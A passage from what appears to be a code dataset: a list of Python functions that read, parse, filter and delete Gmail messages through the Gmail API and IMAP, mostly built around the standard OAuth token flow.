if prop[\"name\"] == \"From\":\r\n # start_email = prop[\"value\"].find(\"<\")\r\n # end_email = prop[\"value\"].find(\">\", start_email + 1)\r\n # email_address = prop[\"value\"][start_email + 1:end_email]\r\n # filter0[\"criteria\"][\"from\"] = filter0[\"criteria\"][\"from\"] + \" OR \" + email_address\r\n service.users().messages().delete(userId=USER_ID, id=msg_id).execute()\r\n\r\n # service.users().settings().filters().delete(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # service.users().settings().filters().create(userId=USER_ID, body=filter0).execute()\r\n print(\"All Spam Deleted!\")", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first time.\n scores = {} # scores is an empty dict already\n\n if os.path.getsize('token.pickle') > 0: \n with open('token.pickle', \"rb\") as f:\n unpickler = pickle.Unpickler(f)\n # if file is not empty scores will be equal\n # to the value unpickled\n scores = unpickler.load()\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n # Starts Gmail V1 with logged in user\n service = build('gmail', 'v1', credentials=creds)\n \n# ================================================================================== \n\n\n # MAIL CHECKHER ================================================================\n\n # get mails via gmail api\n results = service.users().messages().list(userId='me', labelIds=['INBOX']).execute()\n messages = results.get('messages', [])\n\n # mail number\n mail_nr = 0\n\n # variabel for how many mails we want to search through\n message_count = int(input(\"Hur många mails vill du söka igenom? \"))\n # if 0 mails are chosen\n if not messages:\n print('Inga mail i inkorgen')\n else:\n # looks through the email inbox for mails \"message_count\" amount of times\n for message in messages[:message_count]:\n # gets the email id's in full format so we can extraqct information via the gmail api\n msg = service.users().messages().get(userId='me', id=message['id'], format='full', metadataHeaders=None).execute()\n # gets the headers of the email in a variable\n headers = msg[\"payload\"][\"headers\"]\n # from headers gets the sender email, who it was from \n from_ = [i['value'] for i in headers if i[\"name\"]==\"From\"]\n # from headers gets the subject of the email\n subject = [i['value'] for i in headers if i[\"name\"]==\"Subject\"]\n # keeps count of the current email\n mail_nr += 1\n # if the email is from the security system email print it's information\n if from_ == ['Python Ormarna <python.ormar@gmail.com>'] or from_ == ['python.ormar@gmail.com']:\n # gets the email in raw format via gmail api\n rawmsg = service.users().messages().get(userId=\"me\", id=message[\"id\"], format=\"raw\", metadataHeaders=None).execute()\n print(\"=\"*100)\n print(\"\\nMail:\", mail_nr)\n print(\"Detta mail är från erat säkerhetssystem\")\n # variable the UNIX time of when the email was sent\n datum = int(msg['internalDate'])\n datum /= 1000\n # prints the date and time when the email was revived in local y/m/d/h/m/s\n print(\"Mottaget:\", datetime.fromtimestamp(datum).strftime('%Y-%m-%d %H:%M:%S'))\n print(\"Från:\", from_)\n print(\"Ämne:\", subject)\n # prints a snippet from the email\n print(msg['snippet'])\n print(\"\\n\")\n else:\n print(\"=\"*100)\n print(\"\\nMail:\", mail_nr)\n print(\"Detta mail är INTE från erat säkerhetssystem\\n\")\n time.sleep(1)\n print(\"Inga fler mail hittades\")", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n\n user_id = 'me'\n label_id_one = 'INBOX'\n label_id_two = 'UNREAD'\n\n # Call the Gmail API\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n unread_msgs = service.users().messages().list(userId='me',labelIds=[label_id_one, label_id_two]).execute()\n mssg_list = unread_msgs['messages']\n print (\"Total unread messages in inbox: \", str(len(mssg_list)))\n final_list = [ ]\n\n for mssg in mssg_list:\n temp_dict = { }\n m_id = mssg['id'] # get id of individual message\n message = service.users().messages().get(userId=user_id, id=m_id).execute() # fetch the message using API\n payld = message['payload'] # get payload of the message \n headr = payld['headers'] # get header of the payload\n\n\n for one in headr: # getting the Subject\n if one['name'] == 'Subject':\n msg_subject = one['value']\n temp_dict['Subject'] = msg_subject\n else:\n pass\n\n\n for two in headr: # getting the date\n if two['name'] == 'Date':\n msg_date = two['value']\n date_parse = (parser.parse(msg_date))\n m_date = (date_parse.date())\n temp_dict['Date'] = str(m_date)\n else:\n pass\n\n for three in headr: # getting the Sender\n if three['name'] == 'From':\n msg_from = three['value']\n temp_dict['Sender'] = msg_from\n else:\n pass\n\n temp_dict['Snippet'] = message['snippet'] # fetching message snippet\n\n\n try:\n \n # Fetching message body\n mssg_parts = payld['parts'] # fetching the message parts\n part_one = mssg_parts[0] # fetching first element of the part \n part_body = part_one['body'] # fetching body of the message\n part_data = part_body['data'] # fetching data from the body\n clean_one = part_data.replace(\"-\",\"+\") # decoding from Base64 to UTF-8\n clean_one = clean_one.replace(\"_\",\"/\") # decoding from Base64 to UTF-8\n clean_two = base64.b64decode (bytes(clean_one, 'UTF-8')) # decoding from Base64 to UTF-8\n soup = BeautifulSoup(clean_two , \"lxml\" )\n mssg_body = soup.body()\n # mssg_body is a readible form of message body\n # depending on the end user's requirements, it can be further cleaned \n # using regex, beautiful soup, or any other method\n temp_dict['Message_body'] = mssg_body\n\n except :\n pass\n\n print (temp_dict)\n final_list.append(temp_dict) # This will create a dictonary item in the final list\n return final_list[:3]\n # This will mark the messagea as read\n #service.users().messages().list(userId=user_id, id=m_id,body={ 'removeLabelIds': ['UNREAD']}).execute() \n\n\n if not labels:\n print('No labels found.')\n else:\n print('Labels:')\n for label in labels:\n print(label['name'])", "def main():\n \n ####GET ALL MESSAGES FROM GMAIL###\n # gmail_usr_name = raw_input(\"Enter the gmail user name: \\n\")\n # gmail_passwrd = getpass.getpass(\"Enter the Gmail password: \\n\")\n print(\"Please wait while message IDs for Gmail are populated...\")\n gmail_accumulator = Accumulator.Accumulator(GMAIL_PATH, \"usr_name\", \"passwrd\",\n IMAP_PORT, GMAIL_FOLDER)\n gmail_msg_ids = gmail_accumulator.get_ids()\n pprint.pprint(gmail_msg_ids)\n \n ####GET ALL MESSAGES FROM IMAP###\n #IMAP2_usr_name = raw_input(\"Enter the IMAP2 user name: \\n\")\n #IMAP2_passwrd = getpass.getpass(\"Enter the IMAP2 password: \\n\")\n print(\"Please wait while message IDs for IMAP are populated\")\n \n IMAP2_accumulator = Accumulator.Accumulator(\"imap2.lbl.gov\", \"usr_name\", \"passwrd\",\n IMAP_PORT, IMAP2_FOLDER)\n IMAP2_msg_ids = IMAP2_accumulator.get_ids()\n pprint.pprint(IMAP2_msg_ids)\n \n gmail_unique_ids = gmail_accumulator.get_unique_ids()\n ###FIND THE DIFFERENCES BETWEEN IMAP AND GMAIL.####\n compare_ids = Comparator.Comparator(IMAP2_msg_ids, gmail_unique_ids)\n diff_ids = compare_ids.compare()\n \n ###FIND THE DUPLICATE IDs FROM IMAP2.###\n \n dups = IMAP2_accumulator.get_duplicate_ids()\n dup_headers = header_info(dups, IMAP2_accumulator)\n print(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n print(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n \n print(\"-------------------------------------------------------------------------------------\")\n print(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2}\\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n print(\"--------------------------------------------------------------------------------------\")\n pprint.pprint(diff_ids)\n\n print(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n headers = header_info(diff_ids, IMAP2_accumulator)\n\n ###print a table of the info of the missing messages.###\n table = prettytable.PrettyTable([\"TO\", \"FROM\", \"SUBJECT\"])\n table.align[\"TO\"] = \"l\"\n table.padding_width = 1\n for hdr in headers:\n table.add_row(hdr)\n print(table)\n\n\n ###write the output to OUTPUT_FILE.###\n\n output_file = open(OUTPUT_FILE, 'w')\n output_file.write(\"\\n\")\n output_file.write(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n output_file.write(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n output_file.write(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2} \\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n output_file.write(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n for ids in diff_ids:\n output_file.write(str(ids))\n output_file.write(\"\\n\")\n output_file.write(\"\\n\")\n\n ###OUUTPUT THE TABLE###\n\n output_file.write(str(table)) \n output_file.write(LINE_SEPARATOR)\n\n output_file.close()\n\n ucb.interact()", "def gmail(screen):\n\n\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n\n\n\n if not labels:\n print('No labels found.')\n else:\n if PRINT_CATEGORY: print('Labels:')\n for label in labels:\n if PRINT_CATEGORY: print(label['name'])\n if label['name']=='UNREAD':\n listMessages = ListMessagesWithLabels(service, 'me', label['name'])\n nbMessages = len(listMessages)\n nbMess = 0\n\n printTerminal('ENZO! Tu as ['+str(nbMessages)+'] messages non lus.',True)\n say('ENZO! Tu as: '+str(nbMessages)+' messages non lus.')\n\n for message in listMessages:\n #print(GetMessage(service, 'me', message['id'], False))\n nbMess+=1\n ggMessage = GetMessage(service, 'me', message['id'], False)\n #print(ggMessage)\n\n #msg_str = base64.urlsafe_b64decode(ggMessage['raw'].encode('ASCII'))\n #print(msg_str)\n\n for header in ggMessage['payload']['headers']:\n #print(header)\n if header['name']=='Subject':\n #unicode(text,'utf-8')\n #screen.addstr(0,1,\"\")\n if screen:\n screen.addstr(str(nbMess)+'] '+header['value'])\n say(header['value'])\n screen.refresh()\n else:\n print(str(nbMess)+'] '+header['value'])\n say(header['value'])\n #TTS(header['value'],'french', 50 ,2 )\n #status=subprocess.call([\"espeak\",\"-s 100 -v fr \",header['value']], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n #for part in ggMessage['payload']['parts']:\n # msg = base64.urlsafe_b64decode(part['body']['data'].encode('ASCII'))\n # print(removehtml(msg))\n #print(part['body']['data'])\n #say(part['body']['data'])\n if len(sys.argv) > 1:\n if sys.argv[1]=='-t':\n TTS(ggMessage,'french', 50 ,2 )\n #for toto in label:\n # print(toto)", "def verify_email(nickname, quiet):\n\n try:\n account = Account.query.filter_by(nickname=nickname).one()\n except NoResultFound:\n print(f\"Account {nickname} not found\")\n return\n gmail = GmSync.from_account(account, load_config(not quiet))\n gmail.verify()", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n\n # Call the Gmail API\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n\n if not labels:\n print('No labels found.')\n else:\n print('Labels:')\n for label in labels:\n print(label['name'])\n path = \"./ham\"\n try:\n os.mkdir(path)\n except OSError:\n print (\"Creation of the directory %s failed\" % path)\n else:\n print (\"Successfully created the directory %s \" % path)\n\n messages = []\n messages = ListMessagesMatchingQuery(service, 'me', 'in:inbox')\n idx = 0\n for message in messages:\n GetMimeMessage(service, 'me', message['id'], idx)\n idx+=1", "def connect():\n\n mailBox = IMAP4_SSL('imap.gmail.com')\n\n if TESTING:\n mailBox.login(\"sapphirephoenix\", getpass.getpass())\n else:\n mailBox.login(raw_input(\"\\nUsername: \"), getpass.getpass())\n\n result, data = mailBox.select('INBOX', True) # INBOX [Gmail]/All Mail\n\n if result == \"OK\":\n print \"\\n* Connected to mailbox! *\\n\"\n else:\n print \"\\nERROR: Could not connect to mailbox\\n\"\n print \"\\n* Exiting... *\\n\"\n sys.exit(1)\n\n return mailBox", "def check_for_subscribers(mail, login_info):\n ADDRESS, PASSWORD = login_info\n\n try:\n mail.select('inbox')\n data = mail.search(None, 'ALL') \n except:\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(ADDRESS, PASSWORD)\n mail.select('inbox')\n data = mail.search(None, 'ALL')\n \n mail_ids = data[1]\n id_list = mail_ids[0].split() \n\n if not id_list:\n return []\n\n first_email_id = int(id_list[0])\n latest_email_id = int(id_list[-1])\n\n subscribers = []\n\n for i in range(latest_email_id, first_email_id-1, -1):\n data = mail.fetch(str(i), '(RFC822)')\n for response_part in data:\n arr = response_part[0]\n if isinstance(arr, tuple):\n msg = email.message_from_string(str(arr[1],'utf-8'))\n email_from = msg['from']\n subscribers.append(email_from)\n\n return subscribers", "def main(): \r\n # Creating a storage.JSON file with authentication details\r\n # we are using modify and not readonly, as we will be marking the messages \r\n # as Read \r\n SCOPES = 'https://www.googleapis.com/auth/gmail.modify' \r\n store = file.Storage('storage.json') \r\n creds = store.get()\r\n if not creds or creds.invalid:\r\n flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)\r\n creds = tools.run_flow(flow, store)\r\n GMAIL = discovery.build('gmail', 'v1', http=creds.authorize(Http()))\r\n \r\n messages_retrieved=0\r\n num_images=0\r\n save_dir,search_term = read_prefs() \r\n \r\n # Getting all the unread messages from Inbox\r\n unread_msgs = GMAIL.users().messages().list(userId='me',\r\n labelIds=['INBOX', 'UNREAD']).execute()\r\n \r\n # We get a dictonary. Now reading values for the key 'messages'\r\n try:\r\n mssg_list = unread_msgs['messages']\r\n print (\"Total unread messages in inbox: \", str(len(mssg_list)))\r\n except KeyError: #handle the keyerror on no new messages by exiting\r\n print ('No new messages - exiting.')\r\n return 0 \r\n \r\n #loop through the new messages list\r\n for i,mssg in enumerate(mssg_list):\r\n temp_dict = { }\r\n print(\"processing message {} of {}\".format(i+1,len(mssg_list)))\r\n m_id = mssg['id'] # get id of individual message\r\n # fetch the message using API\r\n message = GMAIL.users().messages().get(userId='me', id=m_id).execute() \r\n payld = message['payload'] # get payload of the message \r\n header = payld['headers'] # get header of the payload\r\n \r\n for field in header: # getting the Subject\r\n if field['name'] == 'Subject':\r\n msg_subject = field['value']\r\n temp_dict['Subject'] = msg_subject\r\n if field['name'] == 'Date':\r\n msg_date = field['value']\r\n date_parse = (parser.parse(msg_date))\r\n m_date = (date_parse.date())\r\n temp_dict['Date'] = str(m_date)\r\n else:\r\n pass\r\n \r\n try:\r\n\r\n # Fetching message body\r\n try: #if there is html/data only\r\n part_data = payld['body']['data'] # fetching data\r\n except: #if there are multiple parts get the html part\r\n part_data = payld['parts'][0]['body']['data'] # fetching data from the body\r\n # decoding from Base64 to UTF-8\r\n clean_one = part_data.replace(\"-\",\"+\").replace(\"_\",\"/\")\r\n clean_two = base64.b64decode (bytes(clean_one, 'UTF-8')) \r\n \r\n if search_term in temp_dict['Subject']:\r\n img_list= soup_process_email(clean_two.decode(\"utf8\"))\r\n print ('{} images found.'.format(len(img_list)))\r\n \r\n for i in (img_list):\r\n print (\"downloading: \" +i.split('/')[-1])\r\n #adding the email date to filepath\r\n write_dir=save_dir+temp_dict['Date']+'/'\r\n #checking if path exists (and making it if not)\r\n ensure_dir(write_dir) \r\n if \".jpg\" in i:\r\n # adding filename to write path\r\n write_dir=write_dir+\"/\"+i.split('/')[-1] \r\n else:\r\n # adding 'mp4' extension to movies and removing leading '?'\r\n filename=str(i.split('/')[-1])\r\n write_dir=write_dir+\"/\"+filename[1:]+\".mp4\" \r\n # check if file exists\r\n if not does_file_exist(write_dir):\r\n time.sleep(1) #rate limiting\r\n urllib.request.urlretrieve(i, write_dir) #downloading\r\n # num_images+=len(img_list)\r\n num_images+=1\r\n else:\r\n print ('file already downloaded')\r\n \r\n else:\r\n pass \r\n messages_retrieved+=1\r\n except Exception as e:\r\n print (\"Unexpected error:\", sys.exc_info()[0])\r\n print (\"Unexpected error:\", sys.exc_info()[1])\r\n print (\"Unexpected error:\", sys.exc_info()[2])\r\n except:\r\n pass \r\n \r\n #### This will mark the messages as read. when testing is complete\r\n GMAIL.users().messages().modify(userId='me', \r\n id=m_id,body={ 'removeLabelIds': ['UNREAD']}).execute() \r\n \r\n \r\n print (\"Total messages retrieved: \", messages_retrieved)\r\n print (\"Total images retrieved: \", num_images)", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n\n # Calls the Gmail API to get Emails\n threads = listMessages(service, 'me', 'Jay Patel,')\n\n if not threads:\n print('No TUalerts found.')\n else:\n getCrimeLocation(service, 'me', threads)\n\n # Prints the TUlalerts (Mostly for testing purposes)\n printAlerts()", "def checkMsgNum(m):\n #mboxes = m.list()[1] Show all boxes\n m.select(\"INBOX\")#Select mailbox\n #data = m.search(None, \"(FROM \\\"default@gmail.com\\\")\") Search specific email addy\n #Change \"default@gmail.com\" in above to a specific email address to enable search from particular user\n items = m.search(None, \"(UNSEEN)\")\n msgNum = str(items[1]).rsplit(None)[-1].strip('[\\']')\n\n return msgNum", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n messageIds = []\n i = 0\n nextPageToken = None\n while (i <= 15):\n try:\n response = service.users().messages().list(userId='me', q='after:2016/09/01', maxResults=10000, pageToken=nextPageToken).execute()\n messages = response.get('messages')\n nextPageToken = response['nextPageToken']\n\n for m in messages:\n messageIds.append(m['id'])\n\n i+=1 \n except KeyError:\n break\n\n senders = []\n counter = 0\n for i in messageIds:\n data = service.users().messages().get(userId='me', id=i).execute()\n for d in data['payload']['headers']:\n if d['name'] == 'Received':\n print(d['value'][d['value'].find('; ')+1:d['value'].find('(PST)')])\n if d['name'] == 'From' and 'bounce' not in d['value']:\n senders.append(d['value'])\n print(counter, ' ', d['value'])\n counter += 1\n break\n\n emails = []\n with open('out.csv', 'wb') as f:\n writer = csv.writer(f, delimiter=',')\n for person in set(senders):\n cleaned = clean_data(person)\n name = cleaned[0]\n email = cleaned[1]\n if email not in emails:\n emails.append(email)\n if name != None and email != None:\n writer.writerow([name, email])", "def run_mailcheck (self):\n\t\t# TODO: add function in backend to check if all needed things are set\n\t\t# like server/pass/user/... - if not, show error\n\t\t# if it is not currently refreshing\n\t\tif not self.__mailbackend.refreshing:\n\t\t\tself.__status = mail.MailCheckStatus.REFRESH \n\t\t\tself.redraw_canvas()\n\t\t\tself.__mailbackend.start()\n\t\treturn False\t# in case we are run as a timeout", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n\n service = build('gmail', 'v1', credentials=creds)\n\n labels = ListLabels(service, 'me')\n\n messages = ListMessagesWithLabels(service, 'me', label_ids=[\"CATEGORY_FORUMS\"])", "def email_startup():\n imap = imaplib.IMAP4_SSL('imap.gmail.com')\n # authenticate\n imap.login(email_credentials.email_user, email_credentials.email_pass)\n return imap", "def get_unread_email_ids(gmail_client):\n response = gmail_client.users().messages().list(userId='me',q='is:unread').execute()\n\n if 'messages' in response: # messages key only exists if there are unread messages\n return [message['id'] for message in response['messages']]\n else:\n print(\"No unread messages...\")\n return [] # still return a list since that's what caller expects", "def checkUserEmail(email, number):\n\n if number == 1:\n flag = 0\n atflag = False\n for i in email:\n if i == \"@\":\n atflag=True\n flag += 1\n if i == \".\" and atflag:\n flag += 1\n if flag != 2:\n return False\n return True\n if number == 2:\n c.execute(\"select email from users where email = ?\", (email,))\n if c.fetchall():\n return True\n return False", "def reachable(self):\n service = build('gmail', 'v1', http=Http(timeout=1.0))\n url = urlparse.urlparse(service._baseUrl)\n host = url.hostname\n port = url.port\n try:\n socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)\n except (socket.herror, socket.gaierror, URLError, OSError):\n return False\n return True", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n\n lists,nextPageToken = ListMessages(service,user_id = 'me',q='subject:tradingview')\n # print (lists)\n mes,mes_str = GetMimeMessage(service,user_id = 'me',msg_id = lists[0]['id'])\n print (mes)\n\n\n j = 0\n for part in mes.walk(): \n j = j + 1 \n fileName = part.get_filename() \n contentType = part.get_content_type() \n mycode=part.get_content_charset(); \n # 保存附件 \n if fileName:\n print ('hhhhhhhhhhhhh')\n elif contentType == 'text/plain' or contentType == 'text/html': \n #保存正文 \n data = part.get_payload(decode=True) \n content=str(data); \n # if mycode=='gb2312': \n # content= mbs_to_utf8(content) \n #end if \n # nPos = content.find('降息') \n # print(\"nPos is %d\"%(nPos)) \n # print >> f, data \n # 正则替换掉所有非 <a></a>的标签 <[^>|a]+>\n # reg = re.compile('<[^>|a]+>')\n contentTxt = re.compile('<[^>|a]+>').sub('',content)\n print (reg.sub('',content))\n #end if \n\n\n \n # help(mes)\n # for i in mes.values():\n # print (i)\n # # print (mes[i]);\n # print (\"----------\")\n # print (mes['from'])\n # print (type (mes))\n # # print \n # parsed = Parser().parsestr(mes)\n # print (parsed)\n # print (mes)\n # for i in mes:\n # print (i)\n # for item in lists:\n # mes = GetMimeMessage(service,user_id = 'me',msg_id = item['id'])\n # # print (mes)\n # parsed = Parser().parsestr(mes)\n # print (parsed)", "def check_mail(self, update=False):\r\n return self.check_mail_dir(update=update)", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n user_id = 'me'\n\n ## get_labels ##\n #print_all_labels(service,user_id)\n #fetch_and_store(service,user_id)\n #apply_rules()", "def filter_unread(check_what, criteria, return_what):\n imap = imaplib.IMAP4_SSL(config[\"email\"][\"server\"])\n imap.login(config[\"email\"][\"user\"], config[\"email\"][\"pass\"])\n status, messages = imap.select(\"INBOX\")\n \n status, response = imap.search(None, '(UNSEEN)')\n unread_msg_nums = response[0].split()\n\n ret = [] \n for i in unread_msg_nums:\n parse_return = parse(imap, i, check_what, criteria, return_what)\n if parse_return is not None:\n ret.append(parse_return)\n set_unseen(imap, i)\n imap.close()\n imap.logout()\n\n return ret", "def go():\n # Authenticate\n print('****************** Authenticate ******************')\n\n creds = None\n\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n print('****************** Load Token ******************')\n\n creds = pickle.load(token)\n\n if not creds or not creds.valid:\n print('****************** Credentials ******************')\n\n if creds and creds.expired and creds.refresh_token:\n print('****************** Refresh Credentials ******************')\n\n creds.refresh(Request())\n else:\n print('****************** Load Credentials ******************')\n\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n\n with open('token.pickle', 'wb') as token:\n print('****************** Dump Token ******************')\n\n pickle.dump(creds, token)\n\n print('****************** Load Service ******************')\n\n service = build('gmail', 'v1', credentials=creds)\n\n # Set Date Range\n print('****************** Set Date Range ******************')\n \n start_datetime = datetime.today() - timedelta(days=2)\n end_datetime = datetime.today() + timedelta(days=2)\n\n start_date = start_datetime.strftime(\"%Y/%m/%d\")\n end_date = end_datetime.strftime(\"%Y/%m/%d\")\n\n print(start_date)\n print(end_date)\n\n # Set Query\n print('****************** Set Query ******************')\n\n user_id = 'me'\n full = 'full'\n query = 'after:' + start_date + ' before:' + end_date + ' subject:Your Single Transaction Alert from Chase'\n\n print(query)\n\n # List Messages (All Pages)\n print('****************** Run Query ******************')\n\n response = service.users().messages().list(userId=user_id, q=query).execute()\n\n messages_all_pages = []\n\n if 'messages' in response:\n messages_all_pages.extend(response['messages'])\n\n while 'nextPageToken' in response:\n page_token = response['nextPageToken']\n response = service.users().messages().list(userId=user_id, q=query, pageToken=page_token).execute()\n messages_all_pages.extend(response['messages'])\n\n messages = messages_all_pages\n\n # Find Transactions in Message List\n if not messages:\n print('No messages found...')\n else:\n for message in messages:\n queue_id = message['id']\n\n # Get Message\n this_message = service.users().messages().get(userId=user_id, id=queue_id, format=full).execute()\n\n # Set Message\n message_body = this_message['payload']['body']['data']\n message_html = base64.urlsafe_b64decode(message_body)\n message_text = message_html.decode('utf-8').replace('($USD) ', '')\n\n # Set Transaction Date\n date_message = int(this_message['internalDate'])\n date_object = (date_message / 1000)\n transaction_date = datetime.fromtimestamp(date_object).strftime(\"%Y-%m-%d\")\n\n # Set Amount\n amount = re.search('A charge of (.+?) at', message_text).group(1)\n\n # Set Description\n description = re.search('at (.+?) has', message_text).group(1)\n\n # Build Transaction\n transaction = {\n 'QueueID': queue_id,\n 'TransactionTypeID': 2,\n 'TransactionDT': transaction_date,\n 'Description': description,\n 'Amount': amount,\n 'BudgetCategoryID': '103',\n 'TransactionNumber': '',\n 'Note': 'CC'\n }\n\n print('****************** Transaction Found ******************')\n print(transaction)\n\n # Send to Queue\n response_data = requests.post(url=BUDGET_API, data=transaction)\n\n result = response_data.text\n\n if result == '1':\n print('****************** Transaction Queued ******************')", "def get_unread_count(username, password):\n obj = imaplib.IMAP4_SSL('imap.gmail.com', '993')\n obj.login(username, password)\n obj.select('Inbox')\n message_ids = obj.search(None, \"UNSEEN\")[1]\n list_of_split_strings = str(message_ids).split(\" \")\n unread = len(list_of_split_strings)\n # speak(str(unread))\n return unread", "def connect(self):\n\n mail = Account(self.email, oauth2_token=self.access_token)\n trash_folder = mail.trash_mailbox()\n if pygmail.errors.is_error(trash_folder):\n return False\n else:\n self.mail = mail\n self.trash_folder = trash_folder\n self.inbox = mail.all_mailbox()\n return True", "def main():\n token = 'C:/Users/asif.rouf/PycharmProjects/pythonProject/AX_Admin_portal/Test/utils/google-api-token.json'\n credential = 'C:/Users/asif.rouf/PycharmProjects/pythonProject/AX_Admin_portal/Test/utils/google-api-credentials.json'\n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(token):\n creds = Credentials.from_authorized_user_file(token, SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n credential, SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n # with open('token.json', 'w') as token:\n # token.write(creds.to_json())\n\n service = build('gmail', 'v1', credentials=creds)\n\n # # Call the Gmail API\n # results = service.users().labels().list(userId='me').execute()\n # labels = results.get('labels', [])\n #\n # if not labels:\n # print('No labels found.')\n # else:\n # print('Labels:')\n # for label in labels:\n # print(label['name'])\n\n # Call the Gmail API to fetch INBOX\n results = service.users().messages().list(userId='me', labelIds=['INBOX']).execute()\n messages = results.get('messages', [])\n # message1 = messages[0]\n # print(message1)\n message1 = {'id': '17a5ca5f5f4bd0aa', 'threadId': '17a5b1bb861b3bc2'}\n message1 = {'id': '17a5cbc54c546465', 'threadId': '17a5b1bb861b3bc2'}\n\n # message1 = {'id': '17a5b852afe04a52', 'threadId': '17a50c997c059e68'}\n print(messages)\n print(message1)\n\n if not messages:\n print(\"No messages found.\")\n else:\n print(\"Message snippets:\")\n # for message in messages:\n # msg = service.users().messages().get(userId='me', id=message['id']).execute()\n # print(messages)\n # print(msg['snippet'])\n\n # msg = service.users().messages().get(userId='me', id=message1['id']).execute()\n # print(msg['snippet'])\n ###############################\n msg = service.users().messages().get(userId='me', id=message1['id'], format='raw').execute()\n msg_str = base64.urlsafe_b64decode(msg['raw'].encode('ASCII'))\n mime_msg = email.message_from_bytes(msg_str)\n print(msg['snippet'])\n print(mime_msg)\n print(mime_msg['Date'])\n print(mime_msg['From'])\n print(mime_msg['To'])\n print(mime_msg['Subject'])\n #\n # 